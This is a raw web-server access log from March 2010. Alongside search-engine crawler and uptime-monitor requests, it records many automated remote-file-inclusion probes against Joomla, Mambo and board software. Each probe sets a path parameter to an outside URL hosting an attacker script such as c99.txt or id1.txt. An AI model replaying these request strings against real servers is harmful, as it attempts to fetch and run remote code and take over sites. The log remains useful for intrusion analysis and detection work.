61.183.15.9 - - [19/Mar/2010:03:15:09 -0400] "GET http://www.wantsfly.com/prx2.php HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
77.221.130.11 - - [19/Mar/2010:03:15:21 -0400] "GET /logs/error_log.Q109070200//index2.php?p=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.179.244.70 - - [19/Mar/2010:03:16:09 -0400] "GET /logs/error_log.Q110030500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
84.40.30.37 - - [19/Mar/2010:03:17:20 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.40.30.37 - - [19/Mar/2010:03:17:20 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:03:18:28 -0400] "GET /logs/error_log.Q110022600 HTTP/1.0" 200 3417398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [19/Mar/2010:03:19:07 -0400] "GET /logs/error_log.Q109092600 HTTP/1.1" 200 3378671 "-" "Yandex/1.01.001 (compatible; Win16; I)"
201.28.110.99 - - [19/Mar/2010:03:20:10 -0400] "GET ///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.125.66.118 - - [19/Mar/2010:03:21:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.7.61 - - [19/Mar/2010:03:22:16 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.28.110.99 - - [19/Mar/2010:03:22:57 -0400] "GET /logs///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:03:22:57 -0400] "GET /logs/access_log.Q110020800%20%20///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:03:23:10 -0400] "GET /logs/access_log.Q110011700%20%20///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:03:23:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [19/Mar/2010:03:24:46 -0400] "GET /logs/error_log.Q109090500 HTTP/1.1" 200 3197489 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.104.46.66 - - [19/Mar/2010:03:26:39 -0400] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:26:39 -0400] "GET /logs/access_log.Q109080200/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:26:39 -0400] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
24.148.156.124 - - [19/Mar/2010:03:27:03 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; ERIPPbot; +http://eripp.com)"
174.129.103.67 - - [19/Mar/2010:03:27:13 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
174.129.103.67 - - [19/Mar/2010:03:27:14 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76940 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
67.195.114.252 - - [19/Mar/2010:03:28:43 -0400] "GET /images/_notes/circle_arrow_off.jpg.mno HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.104.46.66 - - [19/Mar/2010:03:29:30 -0400] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:29:30 -0400] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:29:36 -0400] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:29:36 -0400] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:03:30:00 -0400] "GET /logs/access_log.Q109080200%20%20/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:03:30:22 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "-" "Yandex/1.01.001 (compatible; Win16; I)"
165.132.30.11 - - [19/Mar/2010:03:30:33 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:30:33 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:30:33 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:30:57 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:30:57 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:30:57 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
188.138.16.69 - - [19/Mar/2010:03:31:13 -0400] "GET //index2.php?to=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.825"
211.174.176.30 - - [19/Mar/2010:03:31:19 -0400] "GET /encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.174.176.30 - - [19/Mar/2010:03:31:20 -0400] "GET /logs/access_log.Q109101600%20%20/encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.174.176.30 - - [19/Mar/2010:03:31:21 -0400] "GET /logs/encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:03:31:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.174.176.30 - - [19/Mar/2010:03:31:44 -0400] "GET /logs/access_log.Q110020600%20%20/encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.108.66.106 - - [19/Mar/2010:03:31:44 -0400] "GET //index2.php?to=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.812"
66.249.65.53 - - [19/Mar/2010:03:31:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L016A1B5D6342A200416D038+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.174.176.30 - - [19/Mar/2010:03:32:49 -0400] "GET /logs/access_log.Q109123100/encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.174.176.30 - - [19/Mar/2010:03:33:05 -0400] "GET /logs/error_log.Q109090500/encapscms_PATH/core/core.php?root=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:03:33:10 -0400] "GET /logs/error_log.Q109062200 HTTP/1.0" 200 2378634 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.252 - - [19/Mar/2010:03:34:34 -0400] "GET /logs/error_log.Q109082800 HTTP/1.0" 200 3256895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.73.98.177 - - [19/Mar/2010:03:35:29 -0400] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.73.98.177 - - [19/Mar/2010:03:35:29 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.73.98.177 - - [19/Mar/2010:03:35:29 -0400] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:03:35:04 -0400] "GET /logs/error_log.Q109082800 HTTP/1.0" 200 3256895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.138.16.69 - - [19/Mar/2010:03:35:40 -0400] "GET /logs/access_log.Q110010300//index2.php?to=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
188.138.16.69 - - [19/Mar/2010:03:35:40 -0400] "GET //index2.php?to=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.825"
188.138.16.69 - - [19/Mar/2010:03:35:40 -0400] "GET /logs//index2.php?to=http://www.avvocati.ud.it/toghebn/efnet.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.825"
165.132.30.11 - - [19/Mar/2010:03:35:41 -0400] "GET /logs/access_log.Q110013000%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:35:45 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:35:45 -0400] "GET /logs/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:35:50 -0400] "GET /?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:01 -0400] "GET /?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:01 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:01 -0400] "GET /logs/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:36:02 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:36:02 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:36:02 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:06 -0400] "GET /?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:06 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:06 -0400] "GET /logs/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:36:10 -0400] "GET /logs/access_log.Q110021600%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:10 -0400] "GET /?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:10 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:36:10 -0400] "GET /logs/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:03:35:39 -0400] "GET /logs/access_log.Q109092200 HTTP/1.1" 200 4617999 "-" "Yandex/1.01.001 (compatible; Win16; I)"
77.73.98.177 - - [19/Mar/2010:03:36:13 -0400] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.73.98.177 - - [19/Mar/2010:03:36:13 -0400] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
165.132.30.11 - - [19/Mar/2010:03:37:23 -0400] "GET /logs/access_log.Q110013000%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.52.132.143 - - [19/Mar/2010:03:39:04 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
121.52.132.143 - - [19/Mar/2010:03:39:04 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.52.132.143 - - [19/Mar/2010:03:39:04 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.73.98.177 - - [19/Mar/2010:03:39:23 -0400] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.73.98.177 - - [19/Mar/2010:03:39:23 -0400] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//icon/id2.txt? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:03:39:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.52.132.143 - - [19/Mar/2010:03:39:28 -0400] "GET /logs/access_log.Q110021600%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:40:46 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:40:47 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:40:54 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:40:54 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:41:19 -0400] "GET /logs/access_log.Q109090400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:41:19 -0400] "GET /logs/access_log.Q109060500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:41:20 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:41:20 -0400] "GET /logs/error_log.Q109113000%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:41:20 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:41:20 -0400] "GET /logs/access_log.Q109113000%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:41:20 -0400] "GET /logs/access_log.Q109060500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
125.247.160.130 - - [19/Mar/2010:03:41:21 -0400] "GET /logs/access_log.Q109090400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://networks.kpru.ac.th/list/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:03:41:22 -0400] "GET /logs/error_log.Q109113000%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:03:41:22 -0400] "GET /logs/access_log.Q109113000%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:03:41:27 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:03:41:27 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:33 -0400] "GET /cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:35 -0400] "GET /logs/error_log.Q110030400%20%20/cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:35 -0400] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:38 -0400] "GET /cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:38 -0400] "GET /logs/error_log.Q110030400%20%20/cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:03:41:38 -0400] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.16.154 - - [19/Mar/2010:03:41:44 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
80.217.194.122 - - [19/Mar/2010:03:41:44 -0400] "GET / HTTP/1.1" 200 409 "http://eripp.com/?ipdb&start=20" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET CLR 1.1.4322)"
80.217.194.122 - - [19/Mar/2010:03:41:45 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET CLR 1.1.4322)"
65.98.16.154 - - [19/Mar/2010:03:41:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; ERIPPbot; +http://eripp.com)"
80.217.194.122 - - [19/Mar/2010:03:41:48 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://64.221.88.169/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET CLR 1.1.4322)"
80.217.194.122 - - [19/Mar/2010:03:41:53 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET CLR 1.1.4322)"
95.108.128.242 - - [19/Mar/2010:03:41:26 -0400] "GET /logs/access_log.Q109072100 HTTP/1.1" 200 4525475 "-" "Yandex/1.01.001 (compatible; Win16; I)"
65.98.16.154 - - [19/Mar/2010:03:42:13 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
65.98.16.154 - - [19/Mar/2010:03:42:13 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; ERIPPbot; +http://eripp.com)"
121.52.132.143 - - [19/Mar/2010:03:42:31 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:42:34 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:42:34 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:42:34 -0400] "GET /logs/access_log.Q109052900%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.52.132.143 - - [19/Mar/2010:03:42:47 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.52.132.143 - - [19/Mar/2010:03:42:47 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
65.55.106.181 - - [19/Mar/2010:03:42:53 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.52.132.143 - - [19/Mar/2010:03:43:04 -0400] "GET /logs/access_log.Q110021600%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.65.53 - - [19/Mar/2010:03:43:12 -0400] "GET /images/items/05560000_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
81.4.80.187 - - [19/Mar/2010:03:43:16 -0400] "GET /?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:43:16 -0400] "GET /logs/access_log.Q109082100%20%20/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.4.80.187 - - [19/Mar/2010:03:43:16 -0400] "GET /logs/?sourcedir=http://www.reiter-remise.de/modules/idxx.pdf?? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:43:19 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:43:19 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:03:43:19 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
206.18.168.224 - - [19/Mar/2010:03:43:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 2.0.50727)"
